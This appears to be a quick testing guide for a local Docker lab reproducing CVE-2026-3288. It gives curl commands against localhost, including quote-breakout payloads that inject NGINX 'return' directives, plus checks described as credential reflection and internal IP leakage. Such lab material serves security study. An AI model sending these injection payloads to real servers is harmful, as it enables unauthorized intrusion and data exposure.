# CVE-2026-3288 Lab - Quick Testing Guide

## Lab is Running on Port 9090

All tests use: `http://localhost:9090`

---

## Test 1: Basic Connectivity
```bash
curl http://localhost:9090/
```
**Expected:** "CVE-2026-3288 Vulnerable Lab"

---

## Test 2: Configuration Injection (Main Vulnerability)
```bash
curl 'http://localhost:9090/api" return 200 "HACKED'
```
**Expected:** "HACKED - Configuration Injection Successful!"

**What's happening:** The double-quote (") in the path breaks out of NGINX's quoted string and injects `return 200 "HACKED"` directive.

---

## Test 3: Alternative Injection Endpoint
```bash
curl 'http://localhost:9090/vuln" return 200 "PWNED'
```
**Expected:** "PWNED - Injection via rewrite!"

---

## Test 4: Credential Theft
```bash
curl -H "Authorization: Bearer secret123" http://localhost:9090/login
```
**Expected:** JSON response showing your Authorization header was captured

**What's happening:** The backend reflects the Authorization header, demonstrating credential theft.

---

## Test 5: Internal IP Leak
```bash
curl 'http://localhost:9090/admin?internal_ip=true'
```
**Expected:** "Internal IP: 10.0.0.5"

**What's happening:** Injected logic reveals internal network information.

---

## Test 6: Backend Access
```bash
curl http://localhost:9090/backend
```
**Expected:** JSON response from Flask backend showing available endpoints

---

## Automated Testing

Run all tests at once:
```bash
cd /root/abhishek/cve/CVE-2026-3288-lab/exploits
python3 exploit.py --target http://localhost:9090 --all
```

---

## Check Container Status
```bash
docker-compose ps
```

Should show:
- cve-2026-3288-nginx: Up, 0.0.0.0:9090->80/tcp
- cve-2026-3288-backend: Up
- cve-2026-3288-monitor: Up

---

## View Logs
```bash
# NGINX access logs
docker-compose logs -f nginx

# Backend logs
docker-compose logs -f backend

# All logs
docker-compose logs -f
```

---

## Troubleshooting

**Port already in use?**
```bash
docker-compose down -v
docker-compose up -d
```

**Need to rebuild?**
```bash
docker-compose down -v
docker-compose build --no-cache
docker-compose up -d
```

**Check what's on port 9090:**
```bash
sudo lsof -i :9090
# or
sudo netstat -tulpn | grep :9090